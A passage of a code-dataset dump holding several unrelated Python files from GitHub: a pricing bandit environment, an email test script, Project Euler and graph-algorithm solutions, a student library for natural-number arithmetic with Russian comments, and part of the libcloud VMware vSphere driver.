df.groupby([\"region\"]).quantity.sum().sort_values(ascending=False).reset_index()\n good_regions = set(region_to_volume[:20].region) - set([\"LosAngeles\", \"NewYork\"])\n df = df[df.region.isin(good_regions)]\n return df\n\n\nclass PricingAvocadoBanditEnv(Env):\n def __init__(\n self,\n num_arms,\n avocado_df,\n region,\n start_date,\n model_path=\"../data/avocado_lgbm_model.txt\",\n T=10000,\n p_min=0.1,\n p_max=1,\n ):\n super(PricingAvocadoBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.start_date = start_date\n self.current_idx = 0\n self.region = region\n mm_prices = avocado_df[avocado_df.region == region].price.apply([\"min\", \"max\"])\n self.p_min_dataset = mm_prices[\"min\"]\n self.p_max_dataset = mm_prices[\"max\"]\n self.p_min_scale = p_min\n self.p_max_scale = p_max\n\n self.model = lgb.Booster(model_file=model_path)\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n self.action_to_price = np.linspace(self.p_min_scale, self.p_max_scale, num_arms)\n self.action_to_price_dataset = np.linspace(self.p_min_dataset, self.p_max_dataset, num_arms)\n\n self._prepare_predict_df(avocado_df, T)\n\n def step(self, action):\n assert self.action_space.contains(action)\n\n price = self.action_to_price_dataset[action]\n predict_df = self.price_to_predict_df[price]\n observation = 0\n conversion_reward = predict_df.iloc[self.current_idx, :][\"quantity_norm\"]\n # print(predict_df.iloc[self.current_idx, :])\n self.current_idx += 1\n done = False\n info = None\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n def _prepare_predict_df(self, avocado_df, T):\n # Preparing the prediction dataframe from which the rewards will be drawn\n # basically, just predicting the grid of [prices, dates]\n\n def cols_to_categorical(df, categorical_columns):\n df[categorical_columns] = df[categorical_columns].astype(\"category\")\n\n def featurize(df):\n df[\"year-month\"] = df[\"date\"].dt.year * 100 + df[\"date\"].dt.month\n df[\"year\"] = df[\"date\"].dt.year\n df[\"month\"] = df[\"date\"].dt.month\n\n end_date = self.start_date + pd.Timedelta(T - 1, unit=\"D\")\n dates = pd.date_range(start=self.start_date, end=end_date)\n predict_df = pd.DataFrame(\n list(itertools.product(self.action_to_price_dataset, dates)),\n columns=[\"price\", \"date\"],\n )\n predict_df[\"region\"] = self.region\n featurize(predict_df)\n categorical_columns = [\"region\"]\n cols_to_categorical(predict_df, categorical_columns)\n model_cols = [\"price\", \"region\"]\n predict_df[\"quantity_without_noise\"] = self.model.predict(predict_df[model_cols])\n self.q_std = avocado_df[avocado_df.region == self.region].quantity.std()\n self.quantity_norm = avocado_df[avocado_df.region == self.region].quantity.max()\n e = np.random.normal(loc=0, scale=self.q_std, size=predict_df.shape[0]) / 5\n predict_df[\"quantity\"] = predict_df[\"quantity_without_noise\"] + e\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n means = predict_df.groupby(\"price\")[\"quantity_norm\"].mean().reset_index()\n means[\"mean_reward\"] = means[\"quantity_norm\"] * self.action_to_price\n self.max_reward = np.max(means[\"mean_reward\"])\n self.predict_df = predict_df\n\n # splitting the dataframe into slices based on prices\n # would speed up the self.step() significantly\n self.price_to_predict_df = {}\n for p in self.action_to_price_dataset:\n mask = np.isclose(self.predict_df[\"price\"], p)\n self.price_to_predict_df[p] = self.predict_df[mask]\n","repo_name":"thxi/hse_thesis","sub_path":"bandits/pricing/bandits.py","file_name":"bandits.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15623501358","text":"# Import smtplib for the actual sending function\nimport smtplib\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\n# Open a plain text file for reading. For this example, assume that\n# the text file contains only ASCII characters.\nmsg = MIMEText(\"This is an example email.\\nIt contains text.\")\n\n# me == the sender's email address\n# you == the recipient's email address\nmsg['Subject'] = 'Dart Battle Beta Test Signup Request'\nmsg['From'] = \"beta.test@dartbattle.fun\"\nmsg['To'] = \"beta.test@dartbattle.fun\"\n\n# Send the message via our own SMTP server, but don't include the\n# envelope header.\ns = smtplib.SMTP('localhost')\ns.sendmail(me, [you], msg.as_string())\ns.quit()\nprint(\"Success.\")","repo_name":"allenstetson/dartBattle","sub_path":"lambda/us-east-1_dartBattle/emailTest.py","file_name":"emailTest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21848989793","text":"def collatz(n) :\n if n % 2 : \n return 3 * n + 1\n return n // 2 \n\ndic = {}\n\nfor i in range(2 , 1000001) : \n count = 1 ; num = i \n while num != 1 :\n count += 1 \n num = collatz(num)\n if num in dic : \n count += dic[num] - 1 \n num = 1 \n dic[i] = count \n\na = max(dic.values())\n\nfor k , v in dic.items() : \n if v == a :\n print(k)\n break ","repo_name":"PHNPR/Project-Euler-Problem-Solutions-in-Python","sub_path":"014.py","file_name":"014.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13178772875","text":"# Задача N-1(COM_NN_D): \"Сравнение натуральных чисел\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n\r\n# Алгоритм:\r\n# 1)Если длина первого больше длины второго, значит первое больше второго.\r\n# 2)Если длина второго больше длины первого, значит второе больше первого.\r\n# 3)Если длины одинаковы, проверяем каждый разряд числа пока не встретим различие: если цифра в рязряде первого числа больше цифры того же разряда второго числа,\r\n# то первое больше второго и наоборот.\r\n# 4)Если длины одинаковы и различий в разрядах нет, то числа равны.\r\n\r\n# Выходные данные:\r\n# 2 - если первое больше второго.\r\n# 1 - если второе больше первого.\r\n# 0 - если числа равны.\r\n\r\ndef COM_NN_D(n1, arr1, n2, arr2):\r\n if (n1 > n2):\r\n return 2\r\n elif (n1 < n2):\r\n return 1\r\n else:\r\n for i in range(0, n1):\r\n if (arr1[i] > arr2[i]):\r\n return 2\r\n elif (arr1[i] < arr2[i]):\r\n return 1\r\n return 0\r\n\r\n\r\n# Задача N-2(NZER_N_B): \"Проверка на ноль\"\r\n# Выполнил Волосевич А.Н. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число, представленных следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр A[..]\r\n\r\n# Алгоритм:\r\n# 1)Проверяем все цифры числа.\r\n# 2)Если хотя бы одна цифра не ноль, число не равно нулю.\r\n# 3)Иначе число равно нулю.\r\n\r\n# Выходные данные:\r\n# True - если число не 0\r\n# False - если число 0\r\n\r\ndef NZER_N_B(n: int, A: list) -> bool:\r\n for num in A:\r\n if num != 0:\r\n return True\r\n return False\r\n\r\n\r\n# Задача N-3(ADD_1N_N): \"Добавление 1 к натуральному числу\"\r\n# Выполнил Поллуксов А.В. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход натуральное число, представленное следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр arr[..]\r\n\r\n# Алгоритм:\r\n# 1)Добавляем 1 к цифре младшего разряда. Если она равна 9, заменяем её на 0 и добавляем 1 к следующему разряду.\r\n# 2)Если программа таким образом дошла до старшего разряда, который равен 9, значит, у числа появится новый разряд.\r\n\r\n# Выходные данные:\r\n# Целое число n, массив arr[..]\r\n\r\ndef ADD_1N_N(n, arr):\r\n i = n - 1\r\n while i != -1:\r\n arr[i] += 1\r\n if arr[i] == 10:\r\n arr[i] = 0\r\n if i == 0:\r\n arr.insert(0, 1)\r\n n += 1\r\n i -= 1\r\n else:\r\n i = -1\r\n return [n, arr]\r\n\r\n\r\n# Задача N-4(ADD_NN_N): \"Сложение натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход A - массив чисел(натуральное число), n_a - количество цифр числа A, то же самое с B.\r\n\r\n# Алгоритм:\r\n# Получаем на вход массив чисел. Присваиваем переменным i и j индексы последнего элемента массива.\r\n# С помощью функции COM_NN_D сравниваем два числа. Если В больше А, только меняем их местами.(Для удобства работы)\r\n# Далее, начиная с последнего элемента начинаем прибавлять к элементу А элемент В.\r\n# Если число получается больше 10, то прибавляем к следующему элементу единицу, а само число A[i] делаем остатком.\r\n# (A[i] % 10). Если достигаем старшей цифры числа, а эта цифра оказывается больше или равна 10:\r\n# То с помощью insert добавляем в массив единицу\r\n\r\n# Выходные данные:\r\n# Возвращаем массив чисел A (получившаяся сумма) и количество цифр в массиве n_a.\r\n\r\ndef ADD_NN_N(n_a, A, n_b, B):\r\n if COM_NN_D(n_a, A, n_b, B) == 1:\r\n tmp = A\r\n A = B\r\n B = tmp\r\n tmp = n_a\r\n n_a = n_b\r\n n_b = tmp\r\n i = n_a - 1\r\n j = n_b - 1\r\n while (i >= 0):\r\n if j >= 0:\r\n A[i] += B[j]\r\n if A[i] >= 10:\r\n A[i] = A[i] % 10\r\n if i > 0:\r\n A[i - 1] += 1\r\n else:\r\n A.insert(0, 1)\r\n n_a += 1\r\n i -= 1\r\n j -= 1\r\n\r\n return [n_a, A]\r\n\r\n\r\n# Задача N-5(SUB_NN_N): \"Вычитание натуральных чисел\"\r\n# Выполнил Шаров А.К. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр a1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр a2[..]\r\n\r\n# Алгоритм:\r\n# Если числа равны, результат - 0.\r\n# Иначе, проверяем, что первое дейтвительно больше второго.\r\n# Далее, алгоритм вычитания в столбик:\r\n# - начиная с младшего разряда, вычитаем из первой цифры вторую\r\n# - если вторая цифра больше первой, занимаем 1 из следующего разряда\r\n# Результат вычитания записывается в отдельный массив res[..]\r\n\r\n# Выходные данные:\r\n# Длина массива res (номер старшей позиции), и сам массив res[..]\r\n\r\ndef SUB_NN_N(n1: int, a1: list, n2: int, a2: list) -> tuple:\r\n res = []\r\n eq = COM_NN_D(n1, a1, n2, a2)\r\n if eq == 0:\r\n res.append(0)\r\n elif eq == 2:\r\n for i in range(1, n1 + 1):\r\n while n1 > n2:\r\n a2 = [0] + a2\r\n n2 += 1\r\n if a1[-i] >= a2[-i]:\r\n res.append(a1[-i] - a2[-i])\r\n if res[-1] < 0: a1[-i + 1] += 1\r\n else:\r\n a1[-i - 1] -= 1\r\n res.append(a1[-i] - a2[-i] + 10)\r\n res.reverse()\r\n while res[0] == 0: res.pop(0)\r\n return len(res), res\r\n\r\n\r\n# Задача N-6(MUL_ND_N): \"Умножение натурального числа на цифру\"\r\n# Выполнил Катрущенко О.Д. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и цифру\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и цифра D\r\n\r\n# Алгоритм:\r\n# Начиная с младшего разряда, перемножаем разряд на цифру\r\n# - если в результате число из одного разряда, записываем его в массив для ответа\r\n# - если в результате ��исло из двух разядов, то записываем его младший разряд в массив для ответа,\r\n# а старший разряд записываем в вспомогательную переменную, чтобы добавить к результату следующего умножения\r\n\r\n# Выходные данные:\r\n# Целое число n, массив B[..]\r\n\r\ndef MUL_ND_N(n, A, D):\r\n ans = [0 for i in range(n)]\r\n r = 0\r\n for i in range(n - 1, -1, -1):\r\n ans[i] = A[i] * D + r\r\n if ans[i] >= 10:\r\n r = ans[i] // 10\r\n ans[i] = ans[i] % 10\r\n if r != 0:\r\n ans.insert(0, r)\r\n n += 1\r\n return [n, ans]\r\n\r\n\r\n# Задача N-7(MUL_Nk_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и коэффициент\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и коэффициент k\r\n\r\n# Алгоритм:\r\n# заполняем элементы списка нулями, начиная с n-ного элемента и заканчивая n+k\r\n# т.к. итоговое число будет содержать в себе n+k элементов\r\n# увеличиваем счётчик кол-ва цифр\r\n# имеем число n и список a_t, содержащий в себе число, умноженное на 10^k и разбитое на цифры\r\n\r\n# Выходные данные:\r\n# Целое число n, массив a_t[..]\r\n\r\ndef MUL_Nk_N(n, A, k):\r\n a_t = A.copy()\r\n for i in range(n, n + k):\r\n a_t.insert(i, 0)\r\n n += k\r\n return n, a_t\r\n\r\n\r\n# Задача N-8(MUL_NN_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр B[..]\r\n\r\n# Алгоритм:\r\n# если первое число меньше второго - меняем их местами (для удобства работы)\r\n# перемножаем первое число поочерёдно с каждой цифрой из второго числа, начиная с младших разрядов\r\n# сдвигаем разряд произведения, умножив полученное слагаемое на 10^k\r\n# складываем полученные результаты произведений (сумма накапливается в массиве mul0)\r\n# увеличиваем сдвиг (переменная k) на 1\r\n\r\n# Выходные данные:\r\n# Целое число c2, массив mul0[..]\r\n\r\ndef MUL_NN_N(n1, A, n2, B):\r\n mul0 = []\r\n k = 0\r\n\r\n if A == [0] or B == [0]:\r\n c2 = 1\r\n mul0.insert(0, 0)\r\n else:\r\n\r\n if COM_NN_D(n1, A, n2, B) == 1:\r\n A, B = B, A\r\n temp = n1\r\n n1 = n2\r\n n2 = temp\r\n\r\n for i in range(len(B) - 1, -1, -1):\r\n c, L = MUL_ND_N(len(A), A, B[i])\r\n A.reverse()\r\n\r\n c1, L = MUL_Nk_N(c, L, k)\r\n\r\n c2, mul0 = ADD_NN_N(len(mul0), mul0, c1, L)\r\n\r\n k = k + 1\r\n return [c2, mul0]\r\n\r\n\r\n# Задача N-9(SUB_NDN_N): \"Вычитание из натурального другого натурального, умноженного на цифру для случая с неотрицательным результатом\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n# и цифра D, на которую необходимо умножить\r\n\r\n# Алгоритм:\r\n# Умножаем на число, с помощью функции MUL_ND_N, вычитаем, с помощью функции SUB_NN_N, в которой уже есть проверка на то, равны ли числа\r\n\r\n# Выходные данные:\r\n# n_res - длина числа\r\n# A_res - результат вычитания\r\n\r\ndef SUB_NDN_N(n1, A1, n2, A2, D):\r\n A_res = []\r\n n2, A2 = MUL_ND_N(n2, A2, D)\r\n n_res, A_res = SUB_NN_N(n1, A1, n2, A2)\r\n return n_res, A_res\r\n\r\n\r\n# Задача N-10(DIV_NN_Dk): \"Вычисление первой цифры деления большего натурального на меньшее,\r\n# домноженное на 10^k,где k - номер позиции этой цифры (номер считается с нуля)\"\r\n# Выполнил Поллуксов А.В. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход 2 натуральных числа, представленных следующим образом:\r\n# Целое число (n; arr[..]) - номер старшей позиции и массив цифр\r\n\r\n# Алгоритм:\r\n# 1)Циклично умножаем меньшее число на 10, если в результате оно не будет больше бо́льшего числа\r\n# 2)Параллельно с шагом (1) считаем отступ k\r\n# 3)Пока первое число больше второго, отнимаем из бо́льшего меньшее\r\n# 4)Параллельно с шагом (3) считаем цифру d\r\n\r\n# Выходные данные:\r\n# Первая цифра деления d и его позиция k\r\n\r\ndef DIV_NN_Dk(n_1, arr1, n_2, arr2):\r\n arr_1 = arr1.copy()\r\n arr_2 = arr2.copy()\r\n k = 0\r\n while COM_NN_D(n_1, arr_1, n_2 + 1, arr_2 + [0]) != 1:\r\n n_2, arr_2 = MUL_Nk_N(n_2, arr_2, 1)\r\n k += 1\r\n d = 0\r\n while COM_NN_D(n_1, arr_1, n_2, arr_2) != 1:\r\n n_1, arr_1 = SUB_NN_N(n_1, arr_1, n_2, arr_2)\r\n d += 1\r\n return [d, k]\r\n\r\n\r\n# Задача N-11(DIV_NN_N): \"Частное от деления натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# n_1 - длина первого числа, arr_1 - массив цифр первого числа,\r\n# n_2 - длина второго числа, arr_2 - массив цифр второго числа.\r\n\r\n# Алгоритм:\r\n# Создаем результирующий массив k. s - длина массива k. С помощью функции DIV_NN_Dk вычисляем первую цифру частного (arr1 / arr2)\r\n# Прибавляем ее в результирующий массив k. С помощью функции MUL_Nk_N умножаем делитель (arr2) на 10 в степени k_t.\r\n# Вычитаем с помощью функции SUB_NDN_N из arr1 число полученное число t_2 длины t_1 (это arr2 умноженное на 10^k_t)\r\n# Прибавляем 1 к длине результата.\r\n\r\n# Выходные данные:\r\n# Возвращаем результирующий массив k (частное от деления arr1 на arr2 без остатка) и длину этого массива s.\r\n\r\ndef DIV_NN_N(n_1, arr_1, n_2, arr_2):\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n s = k_t + 1\r\n k = [0 for i in range(s)]\r\n while (k_t != 0):\r\n k[s - k_t - 1] = d_t\r\n t_1, t_2 = MUL_Nk_N(n_2, arr_2, k_t)\r\n n_1, arr_1 = SUB_NDN_N(n_1, arr_1, t_1, t_2, d_t)\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n k[s - k_t - 1] = d_t\r\n return [s, k]\r\n\r\n\r\n# Задача N-12(MOD_NN_N): \"Остаток от деления большего натурального числа на меньшее или равное натуральное с остатком(делитель отличен от нуля)\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# С помощью DIV_NN_N находим частное, проверяем не равно ли оно 0, если равно - значит наш массив меньше второго массива, поэтому он является остатком\r\n# Если не равно 0 - с помощью SUB_NDN_N вычитаем из первого числа второе, домноженное на результат деления\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - остаток от деления\r\n\r\ndef MOD_NN_N(n1, arr1, n2, arr2):\r\n b = arr1.copy()\r\n while len(arr1) >= n2:\r\n arr1 = b.copy()\r\n a = DIV_NN_N(n1, arr1, n2, arr2)[1]\r\n arr1 = b\r\n\r\n if a[0] == 0:\r\n return n1, arr1\r\n n1, b = SUB_NDN_N(n1, b, n2, arr2, 1)\r\n arr2.reverse()\r\n\r\n return n1, arr1\r\n\r\n\r\n# Задача N-13(GCF_NN_N): \"НОД натуральных чисел\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# Проверяем какое из двух чисел больше с помощтю функции COM_NN_D, идем в цикле while до того момента,\r\n# пока arr1 и arr2 не равны нулю, при этом если arr1 > arr2 - записываем в arr1 остаток от деления arr1 на arr2,\r\n# иначе наоборот, в конце выводим большее из двух массивов\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОД двух чисел\r\n\r\ndef GCF_NN_N(n1, arr1, n2, arr2):\r\n while NZER_N_B(n1, arr1) == True and NZER_N_B(n2, arr2) == True:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n n1, arr1 = MOD_NN_N(n1, arr1, n2, arr2)\r\n elif COM_NN_D(n1, arr1, n2, arr2) == 1: # arr1 < arr2\r\n n2, arr2 = MOD_NN_N(n2, arr2, n1, arr1)\r\n else:\r\n return n1, arr1\r\n else:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n return n1, arr1\r\n else:\r\n return n2, arr2\r\n\r\n\r\n# N-14(LCM_NN_N): \"НОК натуральных чисел\"\r\n# Выполнил Данилов А.С. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр A2[..]\r\n\r\n# Алгоритм:\r\n# НОК двух натуральных чисел равен их произведению, деленному на НОД этих чисел\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОК двух чисел\r\n\r\ndef LCM_NN_N(n1, A1, n2, A2):\r\n m1, m2 = MUL_NN_N(n1, A1, n2, A2)\r\n g1, g2 = GCF_NN_N(n1, A1, n2, A2)\r\n return DIV_NN_N(m1, m2, g1, g2)\r\n\r\n\r\n","repo_name":"78Moonlight78/dm_computer_algebra","sub_path":"natural.py","file_name":"natural.py","file_ext":"py","file_size_in_byte":21503,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21860311998","text":"import sys\r\nimport heapq\r\nfrom collections import defaultdict\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\ngraph = defaultdict(list)\r\nfor _ in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n graph[b].append((a, c))\r\n\r\n# 최단거리를 이루는 간선 그래프\r\npath_graph = defaultdict(list)\r\npath_graph[1] = [1]\r\n\r\n# 다익스트라 수행\r\ndistance_list = [float('inf')] * (n+1)\r\n\r\n# 1번부터 시작\r\ndistance_list[1] = 0\r\n\r\n# 현재 위치에서 가장 가까운 거리, 노드 번호, 경로 리스트\r\nheap = [(0, 1, [1])]\r\n\r\nwhile heap:\r\n dist, node, path = heapq.heappop(heap)\r\n \r\n if dist > distance_list[node]:\r\n continue\r\n \r\n for adj_node, adj_dist in graph[node]:\r\n new_dist = dist + adj_dist\r\n \r\n if new_dist < distance_list[adj_node]:\r\n distance_list[adj_node] = new_dist\r\n new_path = path + [adj_node]\r\n \r\n path_graph[adj_node] = new_path\r\n \r\n heapq.heappush(heap, (new_dist, adj_node, new_path))\r\n \r\npath_to_recover = set()\r\n\r\n# 모든 정점까지 최단 거리를 이루는 간선 탐색하여 복구할 회선을 찾음\r\nfor key in path_graph.keys():\r\n if key == 1:\r\n continue\r\n \r\n # 최단거리를 이루는 간선 모음\r\n shortest_path = path_graph[key]\r\n for i in range(len(shortest_path)-1):\r\n path_to_recover.add((shortest_path[i], shortest_path[i+1]))\r\n \r\nprint(len(path_to_recover))\r\n\r\nfor path in path_to_recover:\r\n print(path[0], path[1])","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/2211. 네트워크 복구/네트워크 복구.py","file_name":"네트워크 복구.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8994112035","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number = int(input(\"Informe um número: \"))\n except:\n print(\"Apenas valores numéricos devem ser informados!\")\n if(number < 0):\n print(\"Apenas valores positivos devem ser informados!\")\n else:\n soma = 0\n aux = number\n while(aux != 0):\n soma = soma + (aux % 10)\n aux = aux // 10\n print(f\"A soma dos algarismo de {number} é {soma}.\")\n\nif(__name__ == \"__main__\"):\n main()\n","repo_name":"luizfelipe1914/Listas-Python","sub_path":"Lista 02/Questao11.py","file_name":"Questao11.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33493469953","text":"import os\nimport sys\nimport atexit\n\ntry:\n import pysphere\n pysphere\nexcept ImportError:\n raise ImportError('Missing \"pysphere\" dependency. You can install it '\n 'using pip - pip install pysphere')\n\nfrom pysphere import VIServer\nfrom pysphere.vi_task import VITask\nfrom pysphere.vi_mor import VIMor, MORTypes\nfrom pysphere.resources import VimService_services as VI\nfrom pysphere.vi_virtual_machine import VIVirtualMachine\n\nfrom libcloud.utils.decorators import wrap_non_libcloud_exceptions\nfrom libcloud.common.base import ConnectionUserAndKey\nfrom libcloud.common.types import LibcloudError\nfrom libcloud.common.types import InvalidCredsError\nfrom libcloud.compute.base import NodeDriver\nfrom libcloud.compute.base import NodeLocation\nfrom libcloud.compute.base import NodeImage\nfrom libcloud.compute.base import Node\nfrom libcloud.compute.types import NodeState, Provider\nfrom libcloud.utils.networking import is_public_subnet\n\n__all__ = [\n 'VSphereNodeDriver',\n 'VSphere_5_5_NodeDriver'\n]\n\nDEFAULT_API_VERSION = '5.5'\nDEFAULT_CONNECTION_TIMEOUT = 5 # default connection timeout in seconds\n\n\nclass VSphereConnection(ConnectionUserAndKey):\n def __init__(self, user_id, key, secure=True,\n host=None, port=None, url=None, timeout=None):\n if host and url:\n raise ValueError('host and url arguments are mutually exclusive')\n\n if host:\n host_or_url = host\n elif url:\n host_or_url = url\n else:\n raise ValueError('Either \"host\" or \"url\" argument must be '\n 'provided')\n\n self.host_or_url = host_or_url\n self.client = None\n super(VSphereConnection, self).__init__(user_id=user_id,\n key=key, secure=secure,\n host=host, port=port,\n url=url, timeout=timeout)\n\n def connect(self):\n self.client = VIServer()\n\n trace_file = os.environ.get('LIBCLOUD_DEBUG', None)\n\n try:\n self.client.connect(host=self.host_or_url, user=self.user_id,\n password=self.key,\n sock_timeout=DEFAULT_CONNECTION_TIMEOUT,\n trace_file=trace_file)\n except Exception:\n e = sys.exc_info()[1]\n message = e.message\n fault = getattr(e, 'fault', None)\n\n if fault == 'InvalidLoginFault':\n raise InvalidCredsError(message)\n\n raise LibcloudError(value=message, driver=self.driver)\n\n atexit.register(self.disconnect)\n\n def disconnect(self):\n if not self.client:\n return\n\n try:\n self.client.disconnect()\n except Exception:\n # Ignore all the disconnect errors\n pass\n\n def run_client_method(self, method_name, **method_kwargs):\n method = getattr(self.client, method_name, None)\n return method(**method_kwargs)\n\n\nclass VSphereNodeDriver(NodeDriver):\n name = 'VMware vSphere'\n website = 'http://www.vmware.com/products/vsphere/'\n type = Provider.VSPHERE\n connectionCls = VSphereConnection\n\n NODE_STATE_MAP = {\n 'POWERED ON': NodeState.RUNNING,\n 'POWERED OFF': NodeState.STOPPED,\n 'SUSPENDED': NodeState.SUSPENDED,\n 'POWERING ON': NodeState.PENDING,\n 'POWERING OFF': NodeState.PENDING,\n 'SUSPENDING': NodeState.PENDING,\n 'RESETTING': NodeState.PENDING,\n 'BLOCKED ON MSG': NodeState.ERROR,\n 'REVERTING TO SNAPSHOT': NodeState.PENDING\n }\n\n def __new__(cls, username, password, secure=True, host=None, port=None,\n url=None, api_version=DEFAULT_API_VERSION, **kwargs):\n if cls is VSphereNodeDriver:\n if api_version == '5.5':\n cls = VSphere_5_5_NodeDriver\n else:\n raise NotImplementedError('Unsupported API version: %s' %\n (api_version))\n return super(VSphereNodeDriver, cls).__new__(cls)\n\n def __init__(self, username, password, secure=True,\n host=None, port=None, url=None, timeout=None):\n self.url = url\n super(VSphereNodeDriver, self).__init__(key=username, secret=password,\n secure=secure, host=host,\n port=port, url=url)\n\n @wrap_non_libcloud_exceptions\n def list_locations(self):\n \"\"\"\n List available locations.\n\n In vSphere case, a location represents a datacenter.\n \"\"\"\n datacenters = self.connection.client.get_datacenters()\n\n locations = []\n for id, name in datacenters.items():\n location = NodeLocation(id=id, name=name, country=None,\n driver=self)\n locations.append(location)\n\n return locations\n\n @wrap_non_libcloud_exceptions\n def list_images(self):\n \"\"\"\n List available images (templates).\n \"\"\"\n server = self.connection.client\n\n names = ['name', 'config.uuid', 'config.template']\n properties = server._retrieve_properties_traversal(\n property_names=names,\n from_node=None,\n obj_type=MORTypes.VirtualMachine)\n\n images = []\n for prop in properties:\n id = None\n name = None\n is_template = False\n\n for item in prop.PropSet:\n if item.Name == 'config.uuid':\n id = item.Val\n if item.Name == 'name':\n name = item.Val\n elif item.Name == 'config.template':\n is_template = item.Val\n\n if is_template:\n image = NodeImage(id=id, name=name, driver=self)\n images.append(image)\n\n return images\n\n @wrap_non_libcloud_exceptions\n def list_nodes(self):\n vm_paths = self.connection.client.get_registered_vms()\n nodes = self._to_nodes(vm_paths=vm_paths)\n\n return nodes\n\n @wrap_non_libcloud_exceptions\n @wrap_non_libcloud_exceptions\n def ex_clone_node(self, node, name, power_on=True, template=False):\n \"\"\"\n Clone the provided node.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param name: Name of the new node.\n :type name: ``str``\n\n :param power_on: Power the new node on after being created.\n :type power_on: ``bool``\n\n :param template: Specifies whether or not the new virtual machine\n should be marked as a template.\n :type template: ``bool``\n\n :return: New node.\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n new_vm = vm.clone(name=name, power_on=power_on, template=template)\n new_node = self._to_node(vm=new_vm)\n\n return new_node\n\n @wrap_non_libcloud_exceptions\n def ex_migrate_node(self, node, resource_pool=None, host=None,\n priority='default'):\n \"\"\"\n Migrate provided node to a new host or resource pool.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param resource_pool: ID of the target resource pool to migrate the\n node into.\n :type resource_pool: ``str``\n\n :param host: Target host to migrate the host 